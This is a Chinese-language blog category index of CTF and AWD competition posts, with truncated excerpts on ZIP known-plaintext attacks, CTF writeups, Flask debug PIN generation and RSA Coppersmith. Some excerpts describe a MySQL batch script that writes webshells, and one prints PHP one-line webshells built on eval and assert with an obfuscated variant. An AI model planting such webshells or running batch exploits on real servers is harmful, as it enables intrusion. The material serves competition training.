CTF/AWD
Blus.King
道阻且长,行则将至
展开
-
ZIP已知明文攻击深入利用
首发在:https://www.freebuf.com/articles/network/255145.html一、前言你加密的压缩包比你想象中的还不安全!哪怕对于信息安全人员来说,很多时候给压缩包加上一个密码就以为的是万事大吉了。但事实是,很多情况下,你的加密压缩包,远远没有你想象的安全。二、内容概要以往进行ZIP已知明文攻击,通常需要一个完整的明文文件。 而本文讨论的攻击方式只需要知道加密压缩包内容的12个字节,即可进行攻击破解降低了已知明文的攻击难度。同时,结合各类已知的...原创 2020-11-18 11:06:15 · 7573 阅读 · 1 评论 -
2020湖湘杯MISC全解-writeup
MISC1导出index-demo.html,查看代码发现隐藏了一长串base64使用base64隐写进行解密key:"lorrie"得到key说明可能存在某种隐写,是snow隐写,但用网页版的snow隐写解出来是一串乱码,于是尝试使用本地版的SNOW.EXESNOW.EXE -p lorrie index-demo.htmlflag{→_→←_←←_←←_←←_← →_→→_→←_←←_←←_← →_→←_←←_←←_← ←_←←_←←_←→_→→...原创 2020-11-02 18:40:03 · 4533 阅读 · 15 评论 -
Werkzeug更新带来的Flask debug pin码生成方式改变
前言: 首发在Freebuf:https://www.freebuf.com/articles/network/238485.html于2020.4月成稿,时隔3个月被发布,内容为flask debug pin码构造方式的改变。正文: 复现2020GYCTF-FLASKAPP及 2019CISCN double_secret出现异常。题目本身有两个解题方式。其中一个思路是:当Flask开启debug模式时,可以在报错页面输入pin码来执行python命令。...原创 2020-07-06 10:31:24 · 1236 阅读 · 0 评论 -
2019强网杯 - 密码学-RSA-Coppersmith
Coppersmith 相关攻击学习资料:https://ctf-wiki.github.io/ctf-wiki/crypto/asymmetric/rsa/rsa_coppersmith_attack/https://code.felinae98.cn/ctf/crypto/rsa%E5%A4%A7%E7%A4%BC%E5%8C%85%EF%BC%88%E4%BA%8C%EF%BC%...原创 2019-05-28 19:09:55 · 14675 阅读 · 6 评论 -
AWD下-MySql漏洞批量利用脚本
这个脚本最开始的构思是在AWD比赛的情景下,因为所有服务器的环境都相同,只要查看本地的MySql用户名密码就知道了所有服务器的MySql用户名密码。若服务器开放了3306端口,那么利用这一个漏洞就能顺利获得所有服务器权限。有备无患,于是就写了这个Mysql批量连接写小马的脚本。以下是最初的脚本(python2),当然后来又更新换代加了骚思路,过一段时间会放出...... 需要安装mysq...原创 2018-12-09 21:20:02 · 1619 阅读 · 0 评论 -
AWD模式下的各类PHP木马
经典一句话木马最最常见的PHP木马,经典,但也满足不了我们的需求,很容易被大佬识破<?php @eval($_POST["cmd"]); ?><?php@assert($_POST['cmd']);?>混淆马:让木马内容难以识别<?php assert($_POST[-7]); ?> 变换成<?php ...原创 2019-04-19 17:09:29 · 5071 阅读 · 1 评论 -
CTF中压缩包解密的几种常见方式
压缩包解密通用方法:1.用winhex打开,搜索字符pass 、 key 等,查看是否有含有压缩包密码2.如果要爆破: 先0-6位数字来一遍3.如果爆破不成功可以根据题意或者社工 猜密码组合。例如某用户名叫王方,密码就有可能是wangfang123. crc32爆破:压缩包压缩文件会附带crc32校验码,如果字节长度比较短的话,可以尝试crc32爆破。比方说...原创 2018-12-10 19:22:58 · 44691 阅读 · 2 评论 -
安恒月赛WriteUp-2018.12
安恒月赛WriteUp2018-12月 WEB1-easy:web1反序列化 一打开就显示了源代码: <?php @error_reporting(1);include 'flag.php';class baby{ public $file; function __toString() { ...原创 2018-12-22 22:24:51 · 2855 阅读 · 0 评论 -
AWD攻击脚本-多线程-批量-打全场-保存flag
多线程批量attack全场,并输出、保存flag一、针对文件包含漏洞的脚本#!/usr/bin/env python# encoding: utf-8import requestsimport urllibimport timeimport threadingimport base64#批量Get_Flagdef init1(): global ...原创 2019-09-21 22:52:14 · 5138 阅读 · 1 评论